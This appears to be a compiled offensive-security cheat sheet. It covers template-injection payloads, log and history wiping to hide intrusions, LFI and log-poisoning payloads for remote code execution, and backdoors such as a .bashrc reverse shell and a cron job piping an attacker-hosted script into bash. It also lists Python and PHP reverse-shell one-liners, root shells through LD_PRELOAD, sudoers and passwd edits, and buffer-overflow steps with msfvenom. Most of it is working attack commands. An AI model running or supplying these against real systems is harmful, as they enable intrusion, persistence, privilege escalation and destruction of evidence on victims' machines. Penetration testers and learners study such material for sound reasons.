Handlebars (NodeJS):
wrtz{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
-------------------------------------------------------------------
Velocity:
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
-------------------------------------------------------------------
ERB (Ruby):
<%= system("whoami") %>
<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>
-------------------------------------------------------------------
Django Tricks (Python):
{% debug %}
{{settings.SECRET_KEY}}
--------------------------------------------------------------------
Tornado (Python):
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
--------------------------------------------------------------------
Mojolicious (Perl):
<%= perl code %>
<% perl code %>
-------------------------------------------------------------------
Flask/Jinja2: Identify:
{{ '7'*7 }}
{{ [].class.base.subclasses() }} # get all classes
{{''.class.mro()[1].subclasses()}}
{%for c in [1,2,3] %}{{c,c,c}}{% endfor %}


-------------------------------------------------------------------
Flask/Jinja2: 
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
--------------------------------------------------------------------
Jade:
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
--------------------------------------------------------------------
Razor (.Net):
@(1+2)
@{// C# code}
--------------------------------------------------------------------
ASP:
<%response.write(date())%>.
<% Response.Write("testing execution") %>
<%="testing execution" %>

Jinja2

Exploitation

SSTI Map

Cover tracks

Log files

/etc/syslog.conf

# in this file, you can read all the logs that Syslog logs.
# on linux/unix, a lot of systems logs are stored : 
/var/logs
# i.e. 
/var/log/messages
/var/log/auth.log # ssh, sudo attempts

# APACHE
/var/log/apache2/access.log
/var/log/apache2/error.log

# remove your ip :
grep -v '$src-ip-address' /path/to/access_log > a && mv a /path/to/access_log
grep -v <entry-to-remove> <logfile> > /tmp/a ; mv /tmp/a <logfile> ; rm -f /tmp/a

# utmp / wtmp
who
last
lastlog

# COMMAND HISTORY
echo $HISTFILE
# You can set your file size like this to zero, to avoid storing commands.
export HISTSIZE=0

# SHRED FILES
# lets you remove files in a more secure way
shred -zu $filename

MoonWalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine.

It saves the state of system logs pre-exploitation and reverts that state including the filesystem timestamps post-exploitation leaving zero traces of a ghost in the shell.

Installation

curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk
# or
cargo install --git https://github.com/mufeedvh/moonwalk.git
# from source
git clone https://github.com/mufeedvh/moonwalk.git
cd moonwalk/
cargo build --release

Usage

# once we get a shell into the target unix machine, start moonwalk session
moonwalk start
# clear our traces 
moonwalk finish

GraphQL

GraphQL is a query language and server-side runtime for application programming interfaces (APIs) that prioritizes giving clients exactly the data they request and no more.

GraphQL is designed to make APIs fast, flexible, and developer-friendly. It can even be deployed within an integrated development environment (IDE) known as GraphiQL. As an alternative to REST, GraphQL lets developers construct requests that pull data from multiple data sources in a single API call.

Tools

graphinder

pip install graphinder
# using specific python binary
python3 -m pip install graphinder

graphinder -d $domain

graphqlmap

# installation
git clone https://github.com/swisskyrepo/GraphQLmap.git
cd GraphQLmap/
python setup.py install
# usage
graphqlmap -h

Introspection enabled

Send this :

{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}

Introspection not enabled

Fuzz

Dump DB schema

# url encoded
fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}

# full
fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

List path

git clone https://gitlab.com/dee-see/graphql-path-enum.git
cd graphql-path-enum/
graphql-path-enum --help

Vulnerabilities

SQL Injection: simple but classic, try SQL and NoSQL injection in fields values,
- Send a single quote ' inside a graphql parameter to trigger the SQL injection
Debug & information disclosure: Insert bad characters in object or fields name, sometimes DEBUG mode is activated and even if you have a 403 status, you could have a good surprise,
Batching Attack: Batching is the process of taking a group of requests, combining them into one, and making a single request with the same data that all of the other queries would have made (more here). When authentication process is used with GraphQL, batch attack can be performed to simultaneously sending many queries with different credentials, it’s like a bruteforce attack but only with one request. Also, batch attack can be used against 2FA authentication, to bypass rate-limit (if it’s based on number of query by IP for example). More : https://lab.wallarm.com/graphql-batching-attack/

# Create a .yml file just like the other one
nano evil.yml
# Content :
- hosts: localhost
  tasks:
    - name: RShell
      command: chmod u+s /bin/bash
      become: true

# ---
# save the file CTRL+O CTRL+X
# ---

ls -lah /bin/bash
ansible-playbook evil.yml
bash -p
# root

# find config files : 
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null

# (system user account information)
/etc/passwd
/etc/shadow
# (MySQL configuration)
/etc/my.cnf
/etc/mysql/my.cnf
~/.my.cnf
/etc/mysql/conf.d/
/etc/mysql/mysql.conf.d/
/var/lib/mysql/mysql/user.MYD
# (PostgreSQL configuration)
/var/lib/pgsql/data/postgresql.conf 
pg_hba.conf
pg_ident.conf
# (web server configuration)
/etc/httpd/conf/httpd.conf
/etc/nginx/nginx.conf 
/var/apache2/config.inc
# (SSH server configuration)
/etc/ssh/sshd_config
# (Web Server configuration)
/etc/httpd/conf/*
/etc/nginx/*
# (Tomcat configuration)
tomcat-users.xml
find / -name 'tomcat-users.xml'

LFI

Local File Inclusions (LFI)

What is LFI ?

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even XSS.

Typically, LFI occurs when an application uses the path to a file as input. If the application treats this input as trusted, a local file may be used in the include statement.

Check for LFI

The following is an example of PHP code that is vulnerable to LFI.

/**
* Get the filename from a GET input
* Example - http://example.com/?file=filename.php
*/
$file = $_GET['file'];

/**
* Unsafely include the file
* Example - filename.php
*/
include('directory/' . $file);

GET parameter in url

Payloads

http://example.com/index.php?page=../../../etc/passwd
http://example.thm.labs/page.php?file=/etc/passwd 

# NULL BYTE
http://example.thm.labs/page.php?file=../../../../../../etc/passwd%00 

# FILTER BYPASS TRICKS
http://example.com/index.php?page=....//....//etc/passwd
http://example.thm.labs/page.php?file=....//....//....//....//etc/passwd 
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

# DOUBLE ENCODING
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

# UTF-8 ENCODING
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00

FUZZ LFI ENDPOINTS

wfuzz -c -w list-lfi.txt --hc 404,400 --hw 0 https://metabase.peren.fr/api/geojson?url=file:///FUZZ

PHP Wrapper

Used to read .PHP files. It is not possible to read a PHP file's content via LFI because PHP files get executed and never show the existing code. We can use the PHP filter to display the content of PHP files in other encoding formats such as base64 or ROT13.

Commands

http://example.com/page.php?file=php://filter/resource=/etc/passwd

http://example.com/page.php?file=php://filter/read=string.rot13/resource=/etc/passwd

http://example.com/page.php?file=php://filter/convert.base64-encode/resource=/etc/passwd

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

LFI 2 RCE

/proc/self/environ

Like a log file :

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

Via Apache Log Files

# /var/log/apache2/access.log
# set inside the user agent or inside a GET parameter a php shell like :
<?php system($_GET['cmd']); ?>
# same for /proc/self/environ

via SSH

ssh <?php system($_GET["cmd"]);?>@10.10.10.10
# Then include the SSH log files inside the Web Application :
# http://example.com/index.php?page=/var/log/auth.log&cmd=id

via MAIL

First send an email using the open SMTP then include the log file located at http://example.com/index.php?page=/var/log/mail.

root@kali:~# telnet 10.10.10.10. 25
Trying 10.10.10.10....
Connected to 10.10.10.10..
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
helo ok
250 straylight
mail from: mail@example.com
250 2.1.0 Ok
rcpt to: root
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: <?php echo system($_GET["cmd"]); ?>
data2
.

In some cases you can also send the email with the mail command line.

mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null

Via DNS

Check for :
/etc/bind/named.conf

Change the DNS record via nsupdate

nsupdate
> server $ip_target $port_dns_target
> key $key_algorithm:$name_key $secret
> zone $dns_name
> update add mail.$target_domain 86400 A $ip_host
> send

# start python smtpd server to receive mail
python3 -m smtpd -c DebuggingServer -n $ip_host:25

Backdoors

A backdoor refers to any method by which authorized and unauthorized users are able to get around normal security measures and gain high level user access (aka root access) on a computer system, network, or software application.

They are known for being discreet. Backdoors exist for a select group of people in the know to gain easy access to a system or application.

`PAM`

This backdoor essentially consists of adding your own password to the pam_unix.so file

pam_unix.so file is responsible for authentication

pam_unix.so uses the unix_verify_password function to verify to user's supplied password :

`.bashsrc`

If a user has bash as their login shell, the ".bashrc" file in their home directory is executed when an interactive session is launched.

Any user that log in often :

echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc

Put a nc listener

`CronJob`

With a root access

cronjobs file -> /etc/cronjob

Configure a task where every minute a reverse shell is sent to you. Add this line into your cronjob file :

* *     * * *   root    curl http://$attacker_ip:8080/shell | bash

Add this to the shell file :

#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1

On the attacker machine :

nc -nvlp $port

`SSH`

Consists in saving our ssh keys in some user’s home directory. Then we can access it via ssh.

Generate ssh key

ssh-keygen

Copy our key into the user's .ssh directory

mkdir .ssh 
cp id_rsa .ssh/id_rsa

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'

php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.0.0.1",4242);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

# install
wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh

# usage
# shows interesting information that should help you to privesc
./lse.sh -l1 
# dump all the information it gathers about the system
./lse.sh -l2

# install
wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh

# COMMANDS
# Local network
# On the Host
sudo python -m SimpleHTTPServer 80 

# On the Victim
curl $ip/linpeas.sh | sh 

# Without curl
# On the Host
sudo nc -q 5 -lvnp 80 < linpeas.sh 

# On the Victim
cat < /dev/tcp/10.10.10.10/80 | sh 

# USAGE
#all checks - deeper system enumeration, but it takes longer to complete.
./linpeas.sh -a 
# superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk.
./linpeas.sh -s
 #Password - Pass a password that will be used with sudo -l and bruteforcing other users
./linpeas.sh -P

# INSTALL
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

# python 2.6/2.7
python linuxprivchecker.py -w -o linuxprivchecker.log

# python 3.x
pip install linuxprivchecker

# USAGE
linuxprivchecker -w -o linuxprivchecker.log
# or 
python3 -m linuxprivchecker -w -o linuxprivchecker.log

# Connect to a bind shell
pwncat-cs connect://10.10.10.10:4444
pwncat-cs 10.10.10.10:4444
pwncat-cs 10.10.10.10 4444

# Listen for reverse shell
pwncat-cs bind://0.0.0.0:4444
pwncat-cs 0.0.0.0:4444
pwncat-cs :4444
pwncat-cs -lp 4444

# Connect via ssh
pwncat-cs ssh://user:password@10.10.10.10
pwncat-cs user@10.10.10.10
pwncat-cs user:password@10.10.10.10
pwncat-cs -i id_rsa user@10.10.10.10

# SSH w/ non-standard port
pwncat-cs -p 2222 user@10.10.10.10
pwncat-cs user@10.10.10.10:2222

# Reconnect utilizing installed persistence
#   If reconnection fails and no protocol is specified,
#   SSH is used as a fallback.
pwncat-cs reconnect://user@10.10.10.10
pwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf
pwncat-cs user@10.10.10.10
pwncat-cs c228fc49e515628a0c13bdc4759a12bf
pwncat-cs 10.10.10.10

# check sudo version for exploits
sudo -V | grep “Sudo ver”

# check rights
sudo -l
# gtfobins !

# sudo LD_PRELOAD
Defaults        env_keep += LD_PRELOAD

# COMPILE /tmp/exploit.c :

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/sh");
}

# with :

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

# Execute any binary with the LD_PRELOAD to spawn a shell : 

sudo LD_PRELOAD=<full_path_to_so_file> <program>
sudo LD_PRELOAD=/tmp/shell.so find

# sudo_inject | https://github.com/nongiach/sudo_inject

# requirements : 
#    Ptrace fully enabled (/proc/sys/kernel/yama/ptrace_scope == 0).
#    Current user must have living process that has a valid sudo token with the same uid.

sudo whatever
sh exploit.sh

# wait
sudo -i
# root !

ls -la ~/ 
ls -la /var/mail /home/*/ /var/spool/mail /home/*/.bash_history /var

# check those files for hashes
cat /etc/passwd
cat /etc/shadow
ls -la /etc/passwd /etc/shadow

# can we write to the .bashsrc file ? if so, can be executed when us logs in
ls -la /root/.bashrc 
ls -la /home/*/.bashrc
locate .bashrc
find / -name .bashrc -xdev 2>/dev/null

# something is running that we can exploit ?
ps aux | grep root

# localhost open ports ?
netstat -antup

# any useful info in the main bash user files ?
cat /etc/profile 
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout

# check for cronjobs
crontab -l 
ls -alh /var/spool/cron
ls -al /etc/ | grep cron; ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

# PSPY to to see commands run by other users, cron jobs, etc. in real time
./pspy > pspy-out.txt

# unmounted file-systems ?
cat /etc/fstab

# If NFS is open, check if the target has any open NFS shares, if it does, then mount it to your filesystem
showmount -e X.X.X.X
mount X.X.X.X:/ /tmp/mount1

# check installed apps + versions + running ?
ls -alh /usr/bin/ /sbin/ /var/cache/apt/archives /var/cache/yum/
dpkg -l
rpm -qa
# Any useful applications installed? 
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp tmux screen nmap 2>/dev/null

# Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

# ssh
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null

# World writable files on the system
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null

# writable /etc/passwd
# add :
echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy

# writable /etc/sudoers
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers

# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers

# World executable folder
find / -perm -o x -type d 2>/dev/null

# World writable and executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

# SUID / SGID
find / -perm -u=s -type f 2>/dev/null | xargs ls -l
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null 
find / -perm -g=s -type f 2>/dev/null | xargs ls -l
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

# Look for any binaries that seem odd. Any binaries running from a users home directory?
# Check the version of any odd binaries and see if there are any public exploits that can be used to gain root

# SUID PATH
echo $PATH
env | grep PATH
print $PATH

/usr/bin/getcap -r  /usr/bin
getcap -r / 2>/dev/null

## Interesting capabilities
getcap openssl /usr/bin/openssl 
openssl=ep
#  the following capabilities can be used in order to upgrade your current privileges.
cap_dac_read_search # read anything
cap_setuid+ep # setuid

# EXAMPLES
# 1
# linpeas /usr/local/bin/ruby = cap_chown+ep 
echo 'File.chown(<User ID>, nil, "/etc/shadow")' > exploit.rb 
ruby exploit.rb 
chmod 777 /etc/shadow
nano /etc/shadow

# 2
# cap_setuid+ep python2.7
python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
sh-5.0# id
uid=0(root) gid=1000(swissky)

File sharing

lightweight Web Server

# python
python -m SimpleHTTPServer 8080
python3 -m http.server

# busybox
busybox httpd --help # show available options
busybox httpd -p 127.0.0.1:8080 -h /var/www/  # start start httpd 
pkill busybox  # to stop busybo httpd

# npm
http-server

# php
php -S 127.0.0.1:8080

Others

# curl
curl -O http://192.168.0.101/file.txt

# nc
# to share
nc -lvp 4444 < file
# to receive
nc 192.168.1.102 4444 > file

# scp
scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

Fundamentals

Buffer overflows are errors that allow data that is too large to fit into a buffer of the operating system's memory that is not large enough, thereby overflowing this buffer. As a result of this mishandling, the memory of other functions of the executed program is overwritten, potentially creating a security vulnerability.

File formats binary :

Portable Executable Format (PE) - Microsoft Platforms
Executable and Linking Format (ELF) - UNIX

The Memory

.text : contains the actual assembler instructions of the program. This area can be read-only to prevent the process from accidentally modifying its instructions. Any attempt to write to this area will inevitably result in a segmentation fault.
.data : contains global and static variables that are explicitly initialized by the program.
.bss : Several compilers and linkers use the .bss section as part of the data segment, which contains statically allocated variables represented exclusively by 0 bits.
Heap : is allocated from this area. This area starts at the end of the ".bss" segment and grows to the higher memory addresses.
Stack : is a Last-In-First-Out data structure in which the return addresses, parameters, and, depending on the compiler options, frame pointers are stored. C/C++ local variables are stored here, and you can even copy code to the stack. The Stack is a defined area in RAM. The linker reserves this area and usually places the stack in RAM's lower area above the global and static variables. The contents are accessed via the stack pointer, set to the upper end of the stack during initialization. During execution, the allocated part of the stack grows down to the lower memory addresses.

About Stack

Modern memory protections (DEP/ASLR) would prevent the damaged caused by buffer overflows. DEP (Data Execution Prevention), marked regions of memory "Read-Only". The read-only memory regions is where some user-input is stored (Example: The Stack), so the idea behind DEP was to prevent users from uploading shellcode to memory and then setting the instruction pointer to the shellcode. Hackers started utilizing ROP (Return Oriented Programming) to get around this, as it allowed them to upload the shellcode to an executable space and use existing calls to execute it. With ROP, the attacker needs to know the memory addresses where things are stored, so the defense against it was to implement ASLR (Address Space Layout Randomization) which randomizes where everything is stored making ROP more difficult.

Vulnerable functions in C

strcpy
gets
sprintf
scanf
strcat

CPU Registers

Data registers

Pointer registers

Stack frames

Since the stack starts with a high address and grows down to low memory addresses as values are added, the Base Pointer points to the beginning (base) of the stack in contrast to the Stack Pointer, which points to the top of the stack.

As the stack grows, it is logically divided into regions called Stack Frames, which allocate the required memory in the stack for the corresponding function. A stack frame defines a frame of data with the beginning (EBP) and the end (ESP) that is pushed onto the stack when a function is called.

Prevention

Canaries

The canaries are known values written to the stack between buffer and control data to detect buffer overflows. The principle is that in case of a buffer overflow, the canary would be overwritten first and that the operating system checks during runtime that the canary is present and unaltered.

Address Space Layout Randomization (ASLR)

Address Space Layout Randomization (ASLR) is a security mechanism against buffer overflows. It makes some types of attacks more difficult by making it difficult to find target addresses in memory. The operating system uses ASLR to hide the relevant memory addresses from us. So the addresses need to be guessed, where a wrong address most likely causes a crash of the program, and accordingly, only one attempt exists.

Data Execution Prevention (DEP)

DEP is a security feature available in Windows XP, and later with Service Pack 2 (SP2) and above, programs are monitored during execution to ensure that they access memory areas cleanly. DEP terminates the program if a program attempts to call or access the program code in an unauthorized manner.

Containers

An even further defense mechanism is called a container, which is another layer of Data Execution Prevention. The container attempts to identify all possible results of code from data within the buffer (or the data segment) and then prevent the application from calling external functions in shared objects from the inside of the buffer. A version of this has been implemented in Cisco Security Agent, or CSA. Linux's GrSec and PaX kernel patches also implement their own version of contained memory space.

wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh 
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8"))' > deepce.sh

# start
chmod +x ./deepce.sh
./deepce.sh

# create new root user on system
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce

Exploits

Take Control of EIP

One of the most important aspects of a stack-based buffer overflow is to get the instruction pointer (EIP) under control, so we can tell it to which address it should jump. This will make the EIP point to the address where our shellcode starts and causes the CPU to execute it.

Determine the Offset

The offset is used to determine how many bytes are needed to overwrite the buffer and how much space we have around our shellcode.

Create pattern

Shellcode is a program code that contains instructions for an operation that we want the CPU to perform. The manual creation of the shellcode will be discussed in more detail in other modules. But to save some time first, we use the Metasploit Framework (MSF) that offers a Ruby script called “pattern_create” that can help us determine the exact number of bytes to reach the EIP. It creates a unique string based on the length of bytes you specify to help determine the offset.

❯ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1200 > pattern.txt
cat pattern.txt
Aa0Aa1Aa2Aa3Aa4Aa5...<SNIP>...Bn6Bn7Bn8Bn9

# GDB using the generated payload
(gdb) run $(python -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5...<SNIP>...Bn6Bn7Bn8Bn9'") 
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/student/bow/bow32 $(python -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5...<SNIP>...Bn6Bn7Bn8Bn9'")
Program received signal SIGSEGV, Segmentation fault.
0x69423569 in ?? ()

# GDB - EIP
(gdb) info registers eip
eip            0x69423569	0x69423569

# CALCULATING THE OFFSET
# We see that the EIP displays a different memory address, and we can use another MSF tool called "pattern_offset" to calculate the exact number of characters (offset) needed to advance to the EIP.
❯ /usr/bin/ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -q 0x69423569
[*] Exact match at offset 1036

If we now use precisely this number of bytes for our "U"s, we should land exactly on the EIP. To overwrite it and check if we have reached it as planned, we can add 4 more bytes with "\x66" and execute it to ensure we control the EIP.

(gdb) run $(python -c "print '\x55' * 1036 + '\x66' * 4")

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/student/bow/bow32 $(python -c "print '\x55' * 1036 + '\x66' * 4")
Program received signal SIGSEGV, Segmentation fault.
0x66666666 in ?? ()

The EIP has been overwritten with our \x66 characters.

Next, we have to find out how much space we have for our shellcode, which then executes the commands we intend. As we control the EIP now, we will later overwrite it with the address pointing to our shellcode's beginning.

Examine the register and find the address of EBP

(gdb) info registers ebp
ebp            0x55555555          0x55555555

Determine the Length for Shellcode

We have to find out approximately how big our shellcode will be that we will insert, and for this, we will use msfvenom.

Shellcode length

msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 lport=31337 --platform linux --arch x86 --format c

We need a total of 1040 bytes to get to the EIP.
Here, we can use an additional 100 bytes of NOPs
150 bytes for our shellcode.

Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786
NOPs = "\x90" * 100
Shellcode = "\x44" * 150
EIP = "\x66" * 4

Buffer

Now we can try to find out how much space we have available to insert our shellcode.

 (gdb) run $(python -c 'print "\x55" * (1040 - 100 - 150 - 4) + "\x90" * 100 + "\x44" * 150 + "\x66" * 4')

Identification of Bad Characters

\x00 - Null Byte
\x0A - Line Feed
\x0D - Carriage Return
\xFF - Form Feed

Here we use the following character list to find out all characters we have to consider and to avoid when generating our shellcode.

# characters list

